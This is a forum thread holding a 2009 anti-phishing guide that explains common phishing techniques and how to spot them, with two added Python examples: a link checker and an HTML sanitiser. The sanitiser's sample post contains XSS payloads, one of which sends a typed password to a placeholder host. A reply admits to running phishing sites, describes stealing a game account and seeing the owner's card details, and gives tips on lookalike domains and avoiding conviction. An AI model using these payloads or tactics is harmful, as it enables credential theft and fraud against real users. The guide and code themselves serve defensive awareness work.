Phishing: What it is and how to avoid it.

  #1 Lazeka

    Phishing: What it is and how to avoid it.

    Table of Contents

    I. Introduction
    II. The definition of "Phishing" and what it is
    III. Why people use it
    IV. The types of phishing techniques and how people use them
    V. How to avoid Phishing sites
    Conclusion


    I. Introduction

    Let's get started then, shall we? This is my guide on phishing. In it I shall explain what phishing is, how it's used, why it's used, and how to avoid it. All sound like relatively simple things, and they are if you know what you're doing.

    However, many people do not know. And the fact people don't know, to me, is absolutely astounding. It's rather scary how easy it is to steal somebody's personal information, you wouldn't believe how easy it is until you've tried it or seen someone do it.

    This is a rather long guide, I've tried to be as descriptive as possible but if I've made a mistake, placed incorrect information or need to add something feel free to send me a PM or reply so that I can fix it.

    Remember: This is for YOUR benefit, YOU benefit from knowing how to avoid phishers!

    First off, here's the definition of the word "phishing." As well as how the Wikipedia article on the subject puts it.

    Read on to find out the definition of phishing and what it is.

    II. The definition of "Phishing" and what it is

    As told by both Dictionary.com and Wikipedia.org, here are the definitions of Phishing.

    Originally Posted by Dictionary.com
    To request confidential information over the Internet under false pretenses in order to fraudulently obtain credit card numbers, passwords, or other personal data.
    Originally Posted by Wikipedia.org
    In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication.
    Do note these definitions, because they are extremely broad. And you will learn why in the next few sections.

    III. Why people use it

    This one is fairly obvious but I will state it anyway. People phish for information, for knowledge, for money. Some even do it for fun.

    Some of the most common phishers are used to gain bank account details, credit card details, e-mail address, PayPal accounts, etc. All of these can be used to get money.

    To use an example closer to home for you guys, people phish for World of Warcraft accounts (among other MMOs) so that they can either sell the gold found on those accounts, or use those accounts to scam other people in-game with. Or of course, to bot.

    Most of those methods end up getting someone money. Whether you sell the account or just the gold and items on it, you can be sure someone is doing it for money. At least one person, that is.

    IV. The types of phishing techniques and how people use them

    Remember when I said the definitions of phishing were broad? Well, they are. Phishing isn't just limited to making websites to scam people of their details but to practically anything that allows you to gain personal information unlawfully via means of electronic communication. The internet doesn't have to be involved, but it usually is.

    1. Social Engineering

    This is common. Really common, it's also incredibly effective if you can pull it off. The act of using social engineering in phishing is basically to enforce urgency upon a certain topic.

    Certain words or sentences that would raise anxiety in the victim are used, things like "to restore access to your account". In fact, many of you may have seen that very sentence in phishing e-mails for World of Warcraft.

    2. Phone Phishing

    Phone phishing doesn't need a website to work. It generally works in conjunction with e-mail forgeries where the phisher tells the victim to call a particular phone number (the number is owned by the phisher, sometimes provided by a VoIP service as it's cheaper and easier, also less risky).

    Once dialed, the victim is told to enter so and so information. Usernames, passwords, bank account details, credit card information, blah blah blah, etc etc. You get the picture.

    Some phone phishers also fake caller ID data to give the appearance that they are a real and trusted company. This is also far easier to do than masking your URL address.

    3. Link Manipulation

    Link manipulation is exactly what it sounds like. An e-mail may contain a link telling you to go to "worldofwarcraft.com" but, in reality, it actually links you to the phisher's website. This is one of the most common, if not the most common, phishing tactic out there.

    It's also extremely easy to avoid in most cases. For most MMO phishing sites it is fairly straight forward to avoid, for bank sites the phisher will probably take greater precautions so that you stay fooled.

    4. Website Forgeries

    This ties in with link manipulation, because the fun ain't over once you reach the site! It's possible to mask a URL (a technique known as URL masking) so that it shows one address instead of the actual site's address.

    So far, I have never been able to find out how to do it. Websites that work in frames can do so (+1 to those who understand that) apparently, but from personal experience it's not as effective as one may like.

    JavaScript can be used to mask URLs, but I am unaware of the process. There is also a flaw in websites known as "XSS". Or cross-site scripting. This is a flaw in a website's own design.

    Cross-site scripting is a vulnerability which allows code injections into websites. Trusted corporate websites, for example. The kind of sites phishers would target. Most of these injections are client-side (so written in something like JavaScript) and they can be used to change certain details of a website for that viewer.

    Simply put, you go to a site that has an XSS vulnerability. Something's been modified on your end so that certain details such as the URL bar, links, etc have been changed. The site looks perfectly safe and real, but of course, it's not. It's still their site, but things like security certificates still validate for the actual trusted site.

    It's problematic simply because it's so hard to track. The average user isn't going to know. In fact, I wouldn't know. There are methods to get around this though if you are suspicious or very paranoid.

    To put it in perspective how dangerous XSS can be: PayPal faced this vulnerability back in 2006.

    5. The Pop-Up Window

    This one's pretty good, it can be concealed rather well. I've been fooled by it once, myself. You're directed to the trusted website, but the site's been attacked so that, upon visiting, a pop-up window comes up asking for your credentials.

    You pop them in and continue on your merry way. Little do you know, the details were saved in a txt file on the phishers host and you just got your details stolen. Bugger.

    This works on some forums. Especially ones that allow HTML to be posted. For example, you know Curse? Big network for MMOs such as World of Warcraft, Warhammer Online, Aion, etc?

    The script works there.

    6. The Website

    I posted this last because it's common, it's also not hard to explain, and it's not really a "technique" but more of what you'll probably see at a phishing site. Using the above methods the victim is led to The Website.

    E-mails are sent out to convince people their accounts have been compromised, link manipulation is used to make the link in the email look real, then the URL's been masked to fool you.

    You go to the site, it checks out. Or does it? To the naked eye, it will. The layout looks the same. Under the hood the code's probably different, for one, oh and it also saves your details in a txt file (or it sends them to the phisher's email address).

    There are methods to avoid sites like these. Look below for how to do so.

    V. How to avoid Phishing sites

    Methods on how to avoid them. What you need to read and what you must understand if you want any hope of avoiding phishers. Most of the ways are common sense. Here's a list.

    1. Use common sense, don't be stupid.

    This is the single most important rule of not being phished, and is also why I don't give a damn if you get phished. Because most people are stupid. I'm being serious, most victims are stupid.

    Most scams that people here will see will probably be MMO scams. Phishers for WoW and other MMOs. The creators of those don't take many precautions. They use free hosts which you can report, they won't buy security certificates and they won't go out of their way to mask URLs.

    "If it looks too good to be true, it probably is."

    2. Check the URL address

    This ties in with common sense but ALWAYS check the URL. Hell, it even says this on the page to do so. World of Warcraft phishers, as well as the site itself, tell you to always beware of faked sites. Look at the URL.

    A World of Warcraft site is not going to say FreeHostia.com is it? It's going to say worldofwarcraft.com. Look for that. This is one of the main reasons MMO players get their accounts hacked. THEY DON'T LOOK!

    3. Check security certificates

    Some phishers use their own domains, or even their own hosting. Check the security certificates for these, if there are none then don't trust it. If it does have one, check if it's valid, for what and by whom.

    PayPal have a security certificate. As does AlertPay. Both are signed by VeriSign. VeriSign are a well known and trusted seller of Secure Sockets Layer (SSL) Certificates. Sites signed by VeriSign can usually be trusted and I highly doubt a phisher is going to get accepted by VeriSign.

    4. Do a "Whois" lookup

    For those who work in the website industry, you'll probably know what this is. For those who don't, listen up!

    Whois is exactly as it sounds, and works in a similar fashion to the function on WoW. You can look up domain names and IP addresses just by entering them into the Google-like search box found on Who.is (link: Who.is).

    Do this on sites you think may be fake. This is PayPal's, this is Battle.net's, this is Google's, etc etc.

    It's unlikely a phisher has the same IP address as the trusted site, if they're on a free host they'll have the same IP as that free host. Generally it's not necessary to do a Whois lookup, because if you can see the address you'll know it's fake.

    This can be useful for people who may have bought a domain similar to that of a real trademark - like WoW-Cataclysm.com or something (also, WoW-Cataclysm.com is a real site of a guild that has been closed down by the looks of things, lol).

    5. Trusted sites shouldn't ask you for your password

    In fact, they shouldn't even have to. Sites like PayPal, World of Warcraft, Hotmail or banking sites use (or should be using) encryption to protect their users passwords.

    Most of these sites are also set up so that the website administrators can login or change your details to your account at will. They don't need your password because they can change it.

    Most gaming sites such as World of Warcraft or Battle.net also tell you specifically not to tell ANYONE your password, and that they will NEVER ask for it. Game Masters have no need for it and if one does ask for it you should deny them the request and report them to Blizzard.

    6. Don't fall for the betas

    A lot of gaming phishers that go around are for alpha or beta versions of the game. All fake, of course. Take World of Warcraft for example. You opted into that via your account, there was a big button that said "Beta Opt In".

    Blizzard also announced that they were allowing people to opt in to their beta for Wrath of the Lich King. If you get an e-mail from Blizzard saying that the Cataclysm alpha is out, for example, check the website first.

    If the website or your account management shows nothing, then it's fake.

    7. Periodic contact isn't a bad thing

    If you need to talk to a representative of a company, do so. Don't hesitate to do so, do it ASAP. That's what they're there for.

    If your bank e-mails you saying something's happened to your account and they need your details, ring them. If the email has a phone number that it says you should ring, don't ring that, but instead ring the number on their actual website (go to it yourself via your URL bar) or a business card.

    For Blizzard and other game developers, the same thing applies. They have a Customer Service line (I hate that word, should be support, not a bloody service, we pay enough for it!). As do companies like PayPal or Microsoft.

    If in doubt, give them a shout.

    8. Cross-site scripting and website forgeries

    These are hard. It's hard to get around sites that have been abused due to XSS vulnerabilities. It's also hard to get around sites which have URL masking. URL masking can be checked "easily" by looking for a security certificate, a bank would have one, a phisher wouldn't.

    As for XSS, I can't recommend anything because even computer specialists can have trouble looking for them.

    Conclusion

    Well that's it from me. I'm sure I've missed something or said something wrong so please, as I said from the start, feel free to correct me if I'm wrong or if I've missed something by way of PM or reply.

    I hope this guide helps.
    Last edited by Lazeka; 09-21-2009 at 06:03 AM.
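    The checks in sections IV.3 (link manipulation) and V.2 (check the URL) can be automated, and doing so shows exactly what "look at the URL" has to mean. The block below is an added example, not code from the guide or its author: it parses the anchors in a constructed phishing e-mail and reports where each link really goes, flagging links whose visible text names a different host than the href, bare IP hosts, links on a free web host, and hosts that merely contain a trusted name rather than ending in it (so "www.worldofwarcraft.com.phisher.example" and a ".com.au" lookalike both fail the allowlist). TRUSTED_DOMAINS, FREE_HOSTS, the phisher.example and wowphishingsite hosts and the sample e-mail are all assumptions made for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: the reader keeps a short allowlist of the sites they actually log in to.
TRUSTED_DOMAINS = {"worldofwarcraft.com", "battle.net", "paypal.com"}
# Free web hosts the guide says MMO phishers tend to use (constructed list).
FREE_HOSTS = {"freehostia.com"}

# Link text that itself looks like a URL or a bare hostname, e.g. "www.worldofwarcraft.com".
URL_LIKE = re.compile(r"^(?:https?://)?(?:[a-z0-9-]+\.)+[a-z]{2,}(?:[/:]\S*)?$", re.I)
IP_LITERAL = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed sample e-mail: one legitimate link among four phishy ones.
SAMPLE_EMAIL = """
<p>Your account has been flagged. To restore access to your account, log in at
<a href="http://www.worldofwarcraft.com.phisher.example/login">www.worldofwarcraft.com</a>
within 24 hours.</p>
<p>Or use our mirror: <a href="http://203.0.113.7/wow/">Battle.net account management</a></p>
<p>Official site: <a href="https://www.worldofwarcraft.com/account/">worldofwarcraft.com</a></p>
<p>Read more at <a href="http://www.wowphishingsite.com.au/">http://www.wowphishingsite.com/</a></p>
<p><a href="http://wow-login.freehostia.com/">Log in</a></p>
"""


def _split(url):
    """urlsplit() that also accepts a bare host such as 'www.worldofwarcraft.com/login'."""
    parts = urlsplit(url.strip())
    if not parts.scheme:
        parts = urlsplit("http://" + url.strip())
    return parts


def is_trusted_host(host):
    """True only if host IS a trusted domain or a subdomain of one.  The trusted
    name has to be at the END of the hostname: 'worldofwarcraft.com.phisher.example'
    and 'worldofwarcraft.com.au' both fail, 'account.battle.net' passes."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in TRUSTED_DOMAINS)


def _same_site(a, b):
    """Treat 'worldofwarcraft.com' and 'www.worldofwarcraft.com' as the same site."""
    return a == b or a.endswith("." + b) or b.endswith("." + a)


class _LinkCollector(HTMLParser):
    """Collects (visible text, href) pairs for every <a> in the message body."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href") or "", []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((" ".join("".join(self._text).split()), self._href))
            self._href = None


def analyse_links(html):
    """One finding per link: the real host, whether it is allowlisted, and why it looks phishy."""
    collector = _LinkCollector()
    collector.feed(html)
    collector.close()
    brands = [d.split(".")[0] for d in TRUSTED_DOMAINS]  # "worldofwarcraft", "battle", "paypal"
    findings = []
    for text, href in collector.links:
        parts = _split(href)
        host = (parts.hostname or "").rstrip(".")
        reasons = []
        if parts.scheme not in ("http", "https"):
            reasons.append(f"non-web scheme {parts.scheme!r}")
        if parts.username is not None:  # http://www.paypal.com@evil.example/ style
            reasons.append(f"text before '@' is ignored by the browser; real host is {host}")
        if IP_LITERAL.match(host):
            reasons.append("bare IP address instead of a domain name")
        if URL_LIKE.match(text):  # the text claims to be a URL: does it match the href?
            shown = (_split(text).hostname or "").rstrip(".")
            if not _same_site(shown, host):
                reasons.append(f"link text shows {shown} but points at {host}")
        if any(b in text.lower() for b in brands) and not is_trusted_host(host):
            reasons.append("names a trusted brand but the host is not on the allowlist")
        if any(host == h or host.endswith("." + h) for h in FREE_HOSTS):
            reasons.append(f"free web host {host}")
        findings.append({"text": text, "href": href, "host": host,
                         "trusted": is_trusted_host(host), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyse_links(SAMPLE_EMAIL):
        flag = "OK " if f["trusted"] and not f["reasons"] else "BAD"
        print(f"{flag} {f['text']!r:40} -> {f['host']}")
        for r in f["reasons"]:
            print("      -", r)
```

    The allowlist test is the important part: a hostname is only trusted when the whole trusted domain is its suffix, so putting the brand name in a subdomain, in the visible link text, or in front of a different top-level domain does not help the phisher. The suffix rule is a simplification; a mail filter would normally consult the Public Suffix List rather than a hand-kept set.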

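    Section IV.5 describes a pop-up that harvests credentials on a forum which lets members post raw HTML. That one is fixed on the forum's side, not by the reader: posts have to be rendered through an allowlist sanitiser so that script blocks, event-handler attributes and javascript: links never reach the reader's browser. The block below is an added example, not code from the guide or from any forum software. The post payload is constructed for illustration and phisher.example is a placeholder; the allowlist of tags is an assumption. It uses only the standard library, and since html.parser is not a full HTML5 tokenizer a production forum should use a maintained sanitiser library instead of this sketch.

```python
from html import escape
from html.parser import HTMLParser

# Assumption: the forum permits only these tags, with only these attributes on each.
ALLOWED = {"p": set(), "br": set(), "b": set(), "i": set(), "a": {"href"}}
SAFE_HREF = ("http://", "https://")          # rejects javascript:, data:, vbscript: ...
DROP_CONTENT = {"script", "style"}           # drop these tags AND everything inside them

# Constructed example post: the credential pop-up from section IV.5 in three disguises.
POST = (
    '<p>Check my <b>guide</b>!</p>'
    '<script>var p = prompt("Your session expired. Re-enter your password:");'
    'new Image().src = "http://phisher.example/log.php?p=" + encodeURIComponent(p);</script>'
    '<a href="javascript:prompt(\'Password?\')">account page</a> '
    '<a href="https://www.worldofwarcraft.com/" onclick="alert(1)">real link</a>'
    '<img src=x onerror="prompt(\'Login again\')">'
)


class _AllowlistSanitizer(HTMLParser):
    """Rebuilds the post from scratch, emitting only allowlisted tags and attributes."""

    def __init__(self):
        super().__init__()
        self.out = []
        self._drop = 0                       # >0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self._drop += 1
            return
        if self._drop or tag not in ALLOWED:
            return                           # unknown tag (img, iframe, form...): tag goes, text stays
        kept = []
        for name, value in attrs:            # onclick=, onerror= etc. are never in ALLOWED[tag]
            if name not in ALLOWED[tag] or value is None:
                continue
            value = value.strip()
            if name == "href" and not value.lower().startswith(SAFE_HREF):
                continue                     # strip the attribute, keep the link text
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self._drop = max(0, self._drop - 1)
        elif not self._drop and tag in ALLOWED and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._drop:
            self.out.append(escape(data))    # re-escaped, so a literal "<" in a post stays text


def sanitize(post_html):
    """Return the post with everything outside the allowlist removed."""
    s = _AllowlistSanitizer()
    s.feed(post_html)
    s.close()
    return "".join(s.out)


if __name__ == "__main__":
    print(sanitize(POST))
```

    The approach is allowlist, not blocklist: the sanitiser never tries to recognise a bad tag or attribute, it only emits what it positively knows is harmless, so a new attribute name or an odd spelling of "script" gains the attacker nothing. Text inside dropped tags such as script is discarded, text inside merely unknown tags is kept, and all text is re-escaped on output.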
  #2 nosepicker3

    Originally Posted by Lazeka
    Phone phishing doesn't need a website to work. It generally works in conjunction with e-mail forgeries where the phisher tells the victim to call a particular phone number (the number is owned by the phisher, sometimes provided by a VoIP service as it's cheaper and easier, also less risky).
    This is untrue. In my opinion, coming from somebody who has 4-5 phishers up at a time, calling someone from your own phone number (especially if it belongs to the phisher, and isn't a pre-paid # or VoIP) and asking for their billing information or address is extremely, extremely risky and illegal. If you're in trial (unlikely, but possible), and it's on record that you physically asked for their personal information, a conviction is much more likely.
    However, say you phish (or get phished) somebody's battle.net account, you have immediate access to their personal information. If they registered a credit card or bank account to the Battle.net, you can plainly see all of the information.
    Example: This is true because I phished a BNet account, and when I clicked on "billing and shipping information", I plainly saw their name, address, and every detail of their credit card information on the screen. None of it was concealed by the "XXXX-XXXX-XXXX-1234" credit card number blocker that the WoW account website has. What I did with that account was literally e-mail the person I phished using a fake mailer, using the "[email protected] tag" that his account was stolen, and was recovered to its original status. I told him an email was coming in with a new temporary password for him to use, and that he should change it immediately. I then did a password recovery, had it sent to his e-mail, and never used the account again.
    However, you can claim that you never saw or used his personal information, and just used the account for playing. This stands a much better chance than the phone method.


    Originally Posted by Lazeka
    Once dialed, the victim is told to insert so and so information. Usernames, passwords, bank account details, credit card information, blah blah blah, etc etc. You get the picture.

    Some phone phishers also fake caller ID data to give the appearance that they are a real and trusted company. This is also far easier to do than faking a URL address.
    Again, untrue. I know of a site that will give you a URL such as "http://www.wowphishingsite.com.au" The ".com" at the end leads many to believe it's the real deal. It's nearly 100% concealed, minus the ".au" at the end.
    However, I cannot find a single website that will allow you to block/disguise your phone number without at least keeping it on record. If the website has it on record, IT CAN BE FOUND AND USED IN COURT if you're arrested for fraud, assuming you use their credit card information illegally.

    Other than that, it's a really well-written, in-depth guide. Compared to the "let's jump on the new anti-scam bandwagon" threads that give no real information that 95% of people already knew, it's very useful. Well organized, +rep from me.

  #3 codyfromhell
    Boo, nobody *referring to me as everybody* cares about dodging phishers.

  #4 elroyo
    Nice post

  #5 Lazeka
    @nosepicker3: It doesn't matter how risky or illegal it is, some people still do it and I've seen people try and fool me with them before. Some people find the reward greater than the risk.

    Also note that by "fake URL" I mean actually masking it. I should probably specify.

    @codyfromhell: That's why people get fooled for them all the time?
